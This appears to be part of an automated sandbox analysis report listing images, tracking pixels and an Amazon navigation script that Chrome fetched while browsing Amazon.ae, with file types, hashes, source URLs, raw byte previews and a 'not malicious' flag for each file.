                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........3.............................................................................x.;.3.nT.=...<.!..............[]..j|.\..).<......=...k...W.,.............9w.:........u...v}._a..J.........:......$............vo.~.o; ......c....&..=....K)..zP......d..lyR..YW......l'.&M~.w7.YH......B0u......~any..[......#o..]?C.....i.[...Qvso.b.N.O=..L*...M..;B...,%.....2.>.S.....;...dN..d..l...N.|..'`.vF.q.:#....X*.1. ....:...>..ru...p.0g...#.P......<.w7</.g.c..=..}.[....].b.r.t}.^.r[...\..V.........*...mQ...i...........v..n..i........V-v....Y.Ti...I^y...o...........o~k...<(.{.;..H........F_..F_.O..2|..}.c}......O[.O.]7........{.vw..y.. B.a.........8}....FO.vP.....>....l...7./..#..._9...............v..x..........`..:.z.3.-.e..\.......h..(k..vZ.5...}.n....Q.#.....ZZS.m.i.......... ..VtY.>...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5572
                                                                                                                                                                                                                                                                      Entropy (8bit):7.914613394862699
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TsWxxJMQ/1uf4uQEIfy8IbDSAHWeRUjhGbUQ/bd1MBJZoBQCwICwbC8oopsL/dvc:4WxxZuwuQEi+buCUsbx/bD2prgpsTd0
                                                                                                                                                                                                                                                                      MD5:5D0D40620A3BA1203F80EB487A7AEEC7
                                                                                                                                                                                                                                                                      SHA1:C1E9FCAC746EF05228D209FD21BE8B22DCB33FFC
                                                                                                                                                                                                                                                                      SHA-256:6BEC2E1299B6E50A956EDBE60EAE74C96250240BD00384A3E8CA0FF8992A4121
                                                                                                                                                                                                                                                                      SHA-512:DD4E7A78E0727B14C973BB14A93837FEAC91C2A40DCD3F5649F06973F1CF86A444E8842DF26F3788077501BB51BC20AF567B3E20D2D08E9621AE9780B86CC03E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................1.!A."2BQRaq.4r......s..#3b......5t.$c.............................................!1A............?..Z" ""..`IGU....z...y..W.!6.Yp.G...]919.{.5.y...+.,..f.Z^:...o.......Hy..>..3....|..f.=..].5A.....[.......=f|.....$y./.`.;...p-.o......w.....Pl.....[.s6y#....<...NVkck.......:M......v.#...~..H*....=..lr.:.[.hPU...............^....,..y..V.+.......H...DQ0.~...#n.{.4/+m7.lZ.C..j.x^.....co........a.....v..{.W.u..kU;u.c.>Z.5.m...]..z.[..9.j;..Y..y......^'~.....U.lO..7k.i.4...RJn_ara~.R.V..X.T..V........q]j.)..w...x.8..7o.].rYa...*|...81u._...1>2.n.G.ybf..:.l_...7gr.....%6/.......,..68..{..\jH......n.....x#.'.=ED.[..{o/..HRw..jZ........S..-O..F..." ""." ""." ...y..s..\.5....6kCE.'@..o....>./.4.....%..Fy..g.D.1Q.H;o&....z.9.M.....>2Z
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D55%26pc0%3D230%26ld0%3D230%26t0%3D1724264967070%26sc1%3Dportal-bb%26pc1%3D16%26ld1%3D17%26t1%3D1724264966927%26sc2%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb2%3D230%26pc2%3D4237%26ld2%3D4237%26t2%3D1724264971077%26sc3%3Doctopus-search-result-card_apb-browse_0%26bb3%3D955%26be3%3D1232%26pc3%3D7173%26ld3%3D7173%26t3%3D1724264974013%26sc4%3DcsmCELLSframework%26bb4%3D1287%26pc4%3D1287%26ld4%3D1287%26t4%3D1724264968127%26sc5%3DcsmCELLSpdm%26bb5%3D1287%26pc5%3D1292%26ld5%3D1292%26t5%3D1724264968132%26sc6%3DcsmCELLSvpm%26bb6%3D1293%26pc6%3D1293%26ld6%3D1293%26t6%3D1724264968133%26sc7%3DcsmCELLSfem%26bb7%3D1293%26pc7%3D1293%26ld7%3D1293%26t7%3D1724264968133%26sc8%3Due_sushi_v1%26bb8%3D1294%26pc8%3D1295%26ld8%3D1295%26t8%3D1724264968135%26ctb%3D1:9563
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):739306
                                                                                                                                                                                                                                                                      Entropy (8bit):5.577313480445711
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:iu6Pm2tOPdA7gBQ9DtRqcgNTilgo1Y3vKH9aGauo/m9tfnt8Tc:iTPmE7IQ9DtRqcgMlgo1Y3SHrcWqc
                                                                                                                                                                                                                                                                      MD5:BEBE82BD28FE3E03BEF91CB28C29A4AC
                                                                                                                                                                                                                                                                      SHA1:CD482EC9E72BAA6395A1294052D0C3F36D1CA59F
                                                                                                                                                                                                                                                                      SHA-256:96E6C100A8F0EC1EA06DF3DFAE74F4E0F67BEB00A2935618F4CF61A9C6E50E6F
                                                                                                                                                                                                                                                                      SHA-512:F4429904666069646097AC37276F901D66BD2F4DD830CA31C6D5B62358D26371D0474AF2F583E19D3B4D0EDE8C847C7ECDC13AB8DED551E5913638FE0812693A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(y){var f=window.AmazonUIPageJS||window.P,p=f._namespace||f.attributeErrors,d=p?p("NavSharedAssets",""):f;d.guardFatal?d.guardFatal(y)(d,window):d.execute(function(){y(d,window)})})(function(y,f,p){(function(d){if(!d.$Nav||d.$Nav._replay){document.createElement("header");var a=function(){this.data={}},c=function(a){c.manager.add(a)};a.arrayAdder=function(a){return function(){this.data[a]=(this.data[a]||[]).concat([].slice.call(arguments));return this}};a.prototype={build:function(a,b){this.data.name=.a;this.data.value=b;this.data.immediate=!1;this.data.process=!0;c.manager.add(this.data)},run:function(a,b){b&&(this.data.name=a);this.data.value=b||a;this.data.process=!0;c.manager.add(this.data)},publish:function(a,b){this.data.name=a;this.data.value=b;c.manager.publish(this.data)},declare:function(a,b){this.data.name=a;this.data.value=b;c.manager.add(this.data)},when:a.arrayAdder("when"),iff:a.arrayAdder("iff"),filter:a.arrayAdder("filter"),observe:a.arrayAdder("observe")};var
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 124x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):12497
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9661102466348845
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:l5qGxqIHYkDzIg01JWy3eP3ECkZAvfBzh40791E:DqGxVHYknaHWOeP0Bmb4s91E
                                                                                                                                                                                                                                                                      MD5:6B43472584469448EEA61536D143CBA4
                                                                                                                                                                                                                                                                      SHA1:806E0BCBCF3937E07C87C611FC5A9DAC696067D5
                                                                                                                                                                                                                                                                      SHA-256:6C6C2674F80D79CD0FCBD617E8F098FA6A53DC9D4423330297213044738FF5B5
                                                                                                                                                                                                                                                                      SHA-512:4DDA60BBB5690627A1C9EDF9865717CE4C6484B728421F4A4529E811D530FE37801C396261262A35B6385D94573C88918F26849995A65ACA8B9BD642293915FC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........|.."..............................................................!..1"A..2Q#Baq3..RT.....$Cr....bc.....6st....................................................!1.."AQaq...2...BR.#$3...................?..._.v.....t.~.S...FDR. LE..2o,u..u.g...s6.?.[.....T.......A\v.......T..TFN...x..a., .............&..;C.08...M..[...7.3i.d.i..v..y.Ve/.|......P...N.O..W.$H..JI..c&...e...T..F.<.J...p.......M.:..Y.KN.o..{<6=}*..L.^..6.....&..0$|.pG......E..Q.d.l..k.....L9a....A.....#Y.eX.8...|.!\nA....$...i....e.~.'...@. ............?......j.2.IL...w.|$..H.$...f. .F$.t.V..{...x>..~..A..d8j....f.....&.`.kZ.....{...[.8..x...}~..~C..'.{.|...........h..............y.g.o.Oo.4tX.......b...Dk................*E.L........0T..L.[.g..&..*....y....\...?...}.M..f.H..'..........&.$.....&....U...K.....?c.0n...&..6$q...><q.._{..M/.X'..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/rd/uedata?ld&v=0.295396.0&id=3YMHCN1ADEMYQEW81YBE&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=3YMHCN1ADEMYQEW81YBE&ue=10&bb=678&ns=693&af=754&ne=994&be=1200&fp=810&fcp=810&pc=5256&tc=-1918&na_=-1918&ul_=-1724264954036&_ul=-1724264954036&rd_=-1724264954036&_rd=-1724264954036&fe_=-1916&lk_=-1866&_lk=-1866&co_=-1866&_co=-1086&sc_=-1863&rq_=-1081&rs_=-110&_rs=423&dl_=-44&di_=1307&de_=1307&_de=1318&_dc=5255&ld_=5256&_ld=-1724264954036&ntd=0&ty=0&rc=0&hob=7&hoe=11&ld=5257&t=1724264959293&ctb=1&rt=_af:7-2-3-2-2-3-0_ld:42-7-5-27-4-3-1&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-12|aui:css:cache|aui:js:cache|mutObsYes|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|mutObsActive|FWCIMEnabled|fls-eu-amazon-ae|adblk_no|perfYes|fy_cdn_fr|fy_cdn_mp|aui:sw:page_proxy:request_feature_tags:timed_out&viz=visible:10&pty=Landing&spty=BrowsePage&pti=15149894031&tid=3YMHCN1ADEMYQEW81YBE&aftb=1&lob=1
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):27817
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9732938800306
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:VFW1Q8f2vLC+bxNXlrZthmqRd3iCfPui92a8uR0dddK90:VFW17f2vLC+5XhmXCXyv
                                                                                                                                                                                                                                                                      MD5:704C3B654EDFDECA32D1E7722DB2DE28
                                                                                                                                                                                                                                                                      SHA1:2B75C2A6D0D7796F294344C1E7F741C0E83A253C
                                                                                                                                                                                                                                                                      SHA-256:9B573782971618B07E8BA20DE8F72C9A80A1B33D3A99068C1F9EFE09BEC99B83
                                                                                                                                                                                                                                                                      SHA-512:70E1862098315A45FE3902D0BEB61AB9C35FEE71C300527F76D450C3FA221AB19E3FE307200B24D86BFD34026E1E5122C00F0EBE859DFA775D5960A61B28B4A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........6.....................................................................<..X|)uJ."..T!..qq.2..]0&SeX.........@..................[c+I.....;..h.<..ZsZ.....@.<.....!.~..................;]..5.l+........m..1..v.."r.:....Z;.,Q..I.>.5..{.................Fl......2.....7..[..\.D@.P.....4/..Zl...d.].=$..............OS.1..d.:L.mh...d(F.y8..X.)......bD....[.o:C...".c....G...h....R....nb.1.@..........%.V.h.V.6.M.DY.j....S.q.M.u...o..%..Q.e&....q.f.Z.z.4.x.s..t.....u7...}..7.L.BV.W>.W...........=Q....m1.!......._.z..^>t..^..f..J..:./.v.#aU;B..YamJ..>Y1uep.l..U....qU...2`..s....$...zo..jP.X..{..;..k..=.@'..d..`....JX=..b]{2..M.e.4.0......W..h..W.r.T.XO.&.fSK.....uz/.65>...Eo.z.+m"..... .L...O.hp]f.]....=..U...T).}Dr..-...i->....>.gdp..z...a.S.HcB..^...x.)...".t..g.N.....>.......F.Y..G\.hn.Y.Y.O
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11383
                                                                                                                                                                                                                                                                      Entropy (8bit):7.844944681061125
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:kPXPXFF120TFZF0BNDPE7Lb4eLmlRVpb5kFhlkmliSeLaMr3btWZeAMkHQ8ay:kP1N4xPapLA3N5mhviraY3bthAM9y
                                                                                                                                                                                                                                                                      MD5:5C0B67AFBC427537D3D077B35FEBB8F2
                                                                                                                                                                                                                                                                      SHA1:14A5F2004A9F0CDEAF376B86A1A26C46E989176A
                                                                                                                                                                                                                                                                      SHA-256:3A44CCABB8D79992D432BF911A6EFD3EBC69C679888200D525EECF4D4EF6B6D0
                                                                                                                                                                                                                                                                      SHA-512:8234C12611A655D929138C1B39BFDB57631B1B005492832D870F3694425799A2C69020BB2E929EB1AFE5514F50E335E22B9BE85493D36380483739F4FA5E7EAC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................................................................................................................$%j.T(p.`4d&.h..Z ov...-.7.Czo......h....y.5Q..............Yj..d_*..U..^3L....+...?^E.u.&.8A...xs|.!..7..0.7.@s{....tp.(./..{7Sd.n.].As......%;..:...........Q.Wb............i......u.O..y.............9cz..>..z..x....^...............MVi....[i...Y...k.....H.....=."wZ....3./..............RRU.Q...p..<un..>..<......+....M.&.......jf.SU6.......u[kOMKp....A.....?..C..=t..........(.*.....n>y.}..7;.Q.T...z;.f..%.............\......g..p....o`<...X....O..^...........::.:.m..O...m.8.<.P.cgq...5D...ZQ..:].!..-.M..l...|..Mk.{..:.b..`t.5....\o.._...........**.."....m>|j...K_.r._.R'..Gx..w.}.;..?...F>.Qpc.>.q..>.......V.......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 22 x 44, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):538
                                                                                                                                                                                                                                                                      Entropy (8bit):7.4475760232899155
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:12:6v/77GLBx7cIa7DgXBei/VFkqG3INPT1Rd+ml9v5l4FwGeVBGeUuDd+eY:jTrAUXUi/zkRINPTFfVl4FwlXGpu5y
                                                                                                                                                                                                                                                                      MD5:11C9E0E212BC7CFD6FE2442CD5E185D1
                                                                                                                                                                                                                                                                      SHA1:ADE313F5CA61D2799F437EE911A65CA94160609B
                                                                                                                                                                                                                                                                      SHA-256:FA9D39FC627570DFDC4B630BAA47D0AC5DBA5C22370233D8B14C77A65D5A1689
                                                                                                                                                                                                                                                                      SHA-512:011589F29D7195A2348D13BF85BE599724C59FB7CBA90C258E67C2A4508708509DC68AA30F8102725A61AEE94BF1A3A1855CAF90011652539B209C02BA6420C1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/OMJ6YLPcVKydtJQ.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......,.....aUH.....sRGB.........IDATH..1.@..........S..^.Fo!Z.O.A...t..p.|.,..vg......|....Uj.^.A.........|...I.du..Np....D........z..#..k........z.....[.........-.0O..r...=Y..W."I#n.+P.m\.w...^+...J.i....2..j......\..P..P.........SQ....v...L.....H{..#-.B..l0..c3A$......\t./z5-z....x.v.....).c]S\.?~.....^.....j..hK.+..k.)..*...Z.9"...g......."=....E....WZLN....S.d..o-.G..~..m.*.0.}iez..Sd*..s.seN..i.Pp...k)8.uD(..S....BX<_p*j...B...'....H{..#-.B..l0.mc.J..BD...\t./z5.y....b.....?....IEND.B`.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3Asi%26si%3D1936%26pc%3D12737%26at%3D12737%26t%3D1724264943923%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:12737
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 284x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11514
                                                                                                                                                                                                                                                                      Entropy (8bit):7.94133492653697
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:N8oC0JKIk9VqeJXDo9QHeNbHEH8WJYgE0+BUg22zWb/863aMW7deH0se:NDaVN6ONJYg8BUCqb3OdeHde
                                                                                                                                                                                                                                                                      MD5:1E70985462327FEC4E3599703EE3F6BE
                                                                                                                                                                                                                                                                      SHA1:649EE1AE913A6DE0C458AAC09BB3EE985953B6AB
                                                                                                                                                                                                                                                                      SHA-256:125DE6339749A555C83FB652E1C3DF77A866628DC53A8B34FE59A8248510B078
                                                                                                                                                                                                                                                                      SHA-512:482BEF98D7EDE4476994F675D0D4AC4CE749910C6123343B66623C8515A7BA479E39558D36AA501EA72DA17A8DB26E375E18F0D33D2BC9DE6C6C9D2DC4F14115
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51Gz7IimgoL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6..........................................................................1..h....ej..-.n...sc\m.s.P...d.v...k+r.h...h5.}..t.M*z.s....z..9.[...a3.:....k.0...].f\...7.M.DX\5h';s..........^5%...}......~4....%^...R.....Uo.:G........Yk_...n.0......bU...C.&.....Mn/4............cgS.r.|.r..zy..f..I.5'rE&4.O..-lU..].ku...q/.o..D....._..8{.r6..=9jtS.p..%..........R.s........ef5.q.....1&.....5...X....A.=..kgt.._.$..[.x.._F>p}..V...._5..Q..sL._........v...,..s.x.L.N.3......~|..v......>..k....+.E...[.r...)6WS.~..=......U}".....\_=~.|....k9Uw..O..:6...Q..Z+.i.p...<.v...d.bi0.....2.U.#......R.c....z...A.tSFn..:....FX[&..>...+....J,......uY/q.w.."a|O........8..K..$.bVp .mA.^t..E..N.h....O.G}<iN.7z.bx.3.jZK%...........H.p}........Jl.M0..8.V...}.....[......4...F.$..7....-..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6523
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8495395871522815
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TKoGAqaJn5nJG0zE8W1AMzWo3SSpeY8uBTNP5rhGjxcF6DiEC97l8pi8o6PMm5Wv:rx9rn3zJ8zp3vBlrhGxccIMizWBFTs
                                                                                                                                                                                                                                                                      MD5:8B400EB87566C99F56B9F28F5EB5269C
                                                                                                                                                                                                                                                                      SHA1:48DACF11E30019D5BB791F77BC910A49DF7E823A
                                                                                                                                                                                                                                                                      SHA-256:C219AE79A407024EBFCA7E81B1946EE393AF6DDB78D42F2616B8ABDB5EEB18FE
                                                                                                                                                                                                                                                                      SHA-512:2E1391212BFD4A111A14A1F56C523661ED78F2E2E84B8898F2BB1C9957919AA6823D480B482F8EA09F5FA94B5DDB92F6B0778E44F36C18361ACBE21D27AAE971
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41qWHXXnEKL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`........................................R)%6QK.....&..".&...J....I.Qv.U...............i.t:..">......~n..a..N.O..v......k....|9..7..<._.....?........W9.0.v...j..."....m...[[.=.........^....z=............#......f...6.....u..{n.9.u.".k..B.....+......;m]..5?\.5.D......L.{N;..k~.k...G..^.F...'1..;..9.:.'......s{(.e./....~X...s.!........rlE.o...F.8ogs.:..O}......."..1.M];.b.V.;........?...t_|G......8.E2.-..#._u._>..f|/sM.E......R.....fk..a.rQ....T].Q...0...c.y=Y.da..F..da..F<...@.................................................................!..012.."#43AQp.$B............ld..X.!y...^+.[D..../6..3xp./6.y...A....O.}Ny;3Y...m1.=o..^k2.aW..._P}.:S.2.q...7. <mC..t.7.......DO.(.j.d./Q.4#..aXp.O8.V.S.n..ca..\.Z'..)E.'...0..k..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):58623
